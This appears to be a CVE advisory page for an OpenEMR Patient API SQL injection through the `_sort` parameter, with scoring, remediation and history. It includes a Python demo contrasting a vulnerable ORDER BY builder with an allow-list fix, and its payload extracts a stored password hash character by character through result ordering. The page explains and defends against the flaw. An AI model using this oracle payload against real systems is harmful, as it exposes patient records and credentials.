Description
OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the `_sort` parameter. This could potentially lead to database access, PHI (Protected Health Information) exposure, and credential compromise. The issue occurs when user-supplied sort field names are used in ORDER BY clauses without proper validation or identifier escaping. Version 8.0.0 fixes the issue.
Published: 2026-02-25
Score: 10 Critical
EPSS: < 1% Very Low
KEV: No
Impact: SQL Injection that can expose PHI and compromise credentials
Action: Apply patch
AI Analysis

Impact

The flaw lies in the Patient REST API, where the value of the `_sort` parameter is placed into an ORDER BY clause without validation or identifier escaping, so an authenticated API user controls part of the SQL text that the database executes. Because the injected text is evaluated by the database with the application's own privileges, the injection can lead to reads across the database, disclosure of protected health information, and possible compromise of stored user credentials.

Affected Systems

OpenEMR systems running any version earlier than 8.0.0 are affected. Version 8.0.0 and later contain the fix that properly escapes or validates the sort field names.

Risk and Exploitability

The vulnerability carries a CVSS 3.1 base score of 10.0 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), classifying it as critical. Its EPSS score falls below 1%, indicating a low predicted exploitation probability, and it is not listed in the CISA KEV catalogue. Exploitation requires authentication to the OpenEMR API (PR:L), so the expected attacker is a legitimate user or insider acting maliciously, or an external party holding compromised API credentials. The exploitation path is straightforward: the attacker supplies a crafted `_sort` value that is evaluated as part of the ORDER BY clause. Because the injection point is an ORDER BY expression rather than a WHERE clause, the attacker typically cannot append further statements, but can embed subqueries against other tables and read their results through changes in result ordering or response time, which is enough to extract PHI and credential hashes one character at a time.

Generated by OpenCVE AI on April 17, 2026 at 15:02 UTC.

Remediation

Vendor fix: upgrade to OpenEMR 8.0.0 or later, which validates or escapes the sort field names. No vendor workaround for earlier versions is listed.

OpenCVE Recommended Actions

  • Upgrade to OpenEMR version 8.0.0 or later to apply the vendor patch
  • Since exploitation requires an authenticated API user, limit API access to the accounts and client registrations that need it and enforce least‑privilege roles
  • Add server‑side validation to the `_sort` parameter, accepting only an allow‑list of known field names and mapping each one to a fixed column identifier rather than copying the user‑supplied string into the query
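As an added example, not code from the OpenEMR project, the following Python script reproduces the pattern that the description and the third recommended action refer to: a vulnerable ORDER BY builder that splices `_sort` into the query text, beside a hardened builder that parses a FHIR-style `_sort` syntax (comma-separated fields, leading `-` for descending) and maps each field through an allow-list of known columns. The sort syntax, the table and column names, and the sample rows are assumptions made for the demo, not taken from OpenEMR's schema. It runs against an in-memory SQLite database with constructed rows and shows how the vulnerable builder turns result ordering into a boolean oracle that leaks the first character of a stored credential.

```python
import re
import sqlite3

# Constructed sample rows standing in for patient and user tables (assumption,
# not OpenEMR's real schema). Last names are in reverse alphabetical order of
# first names so that the two sort orders are distinguishable.
SAMPLE_PATIENTS = [
    (1, "Alice", "Zimmer", "1980-01-01"),
    (2, "Bob", "Young", "1975-05-05"),
    (3, "Carol", "Xu", "1990-09-09"),
]
SAMPLE_USERS = [(1, "admin", "s3cret-hash")]

BASE_QUERY = "SELECT pid, fname, lname FROM patient_data ORDER BY "


def make_db():
    """Build an in-memory SQLite database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patient_data (pid INTEGER, fname TEXT, lname TEXT, DOB TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO patient_data VALUES (?, ?, ?, ?)", SAMPLE_PATIENTS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_order_by(sort_param):
    """Vulnerable pattern (CWE-89): the user-supplied _sort value becomes SQL text."""
    return BASE_QUERY + sort_param


# Hardened pattern: only names in this allow-list are accepted, and the SQL
# receives the fixed column identifier from the map, never the client's bytes.
SORTABLE_COLUMNS = {"fname": "fname", "lname": "lname", "dob": "DOB", "pid": "pid"}
FIELD_RE = re.compile(r"^-?[A-Za-z_][A-Za-z0-9_]*$")


def safe_order_by(sort_param):
    """Parse '-lname,fname' style input and build ORDER BY from allow-listed columns."""
    clauses = []
    for field in sort_param.split(","):
        field = field.strip()
        if not FIELD_RE.match(field):
            raise ValueError(f"malformed sort field: {field!r}")
        direction = "DESC" if field.startswith("-") else "ASC"
        column = SORTABLE_COLUMNS.get(field.lstrip("-").lower())
        if column is None:
            raise ValueError(f"unsupported sort field: {field!r}")
        clauses.append(f"{column} {direction}")
    return BASE_QUERY + ", ".join(clauses)


def first_name_order(conn, query):
    """Run a query and return the first names in the order the database chose."""
    return [row[1] for row in conn.execute(query)]


def oracle_payload(guess):
    """ORDER BY expression whose sort key depends on a guess about another table.

    If the guessed first character of the admin password is right, rows sort
    by fname; otherwise by lname. The attacker reads the answer from the order.
    """
    return (
        "(CASE WHEN (SELECT substr(password, 1, 1) FROM users WHERE id = 1) = "
        f"'{guess}' THEN fname ELSE lname END)"
    )


def leak_first_char(conn):
    """Boolean-based extraction through the vulnerable builder, one guess at a time."""
    for guess in "abcdefghijklmnopqrstuvwxyz0123456789":
        order = first_name_order(conn, vulnerable_order_by(oracle_payload(guess)))
        if order == ["Alice", "Bob", "Carol"]:  # fname order: the guess was right
            return guess
    return None


def run_demo():
    """Exercise both builders and report what each one does with the payload."""
    conn = make_db()
    try:
        safe_order_by(oracle_payload("s"))
        payload_rejected = False
    except ValueError:
        payload_rejected = True
    return {
        "leaked_first_char": leak_first_char(conn),
        "safe_sql": safe_order_by("-lname,fname"),
        "payload_rejected": payload_rejected,
    }


if __name__ == "__main__":
    print(run_demo())
```

The allow-list is the real control: the regex only gives a clearer error for junk input, and the attacker's string never reaches the SQL text because the query is assembled from the map's values. Extending the same character-by-character loop over `substr(password, n, 1)` recovers the whole hash, which is why an ORDER BY injection on a PHI database still rates as critical even though it cannot append statements.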



Advisories

No advisories yet.

History

Fri, 27 Feb 2026 14:45:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Open-emr
                                      Open-emr openemr
CPEs                                  cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
Vendors & Products                    Open-emr
                                      Open-emr openemr

Thu, 26 Feb 2026 13:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Openemr
                                      Openemr openemr
Vendors & Products                    Openemr
                                      Openemr openemr

Wed, 25 Feb 2026 19:00:00 +0000

Type                 Values Removed   Values Added
Description                           OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0, an SQL injection vulnerability in the Patient REST API endpoint allows authenticated users with API access to execute arbitrary SQL queries through the `_sort` parameter. This could potentially lead to database access, PHI (Protected Health Information) exposure, and credential compromise. The issue occurs when user-supplied sort field names are used in ORDER BY clauses without proper validation or identifier escaping. Version 8.0.0 fixes the issue.
Title                                 OpenEMR has SQL Injection in Patient API Sort Parameter
Weaknesses                            CWE-89
References
Metrics                               cvssV3_1 {'score': 10, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-02-26T16:14:34.090Z

Reserved: 2026-01-27T19:35:20.530Z

Link: CVE-2026-24908

Vulnrichment

No data.

NVD

Status : Analyzed

Published: 2026-02-25T19:43:21.657

Modified: 2026-02-27T14:42:29.287

Link: CVE-2026-24908

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-17T15:15:21Z

Weaknesses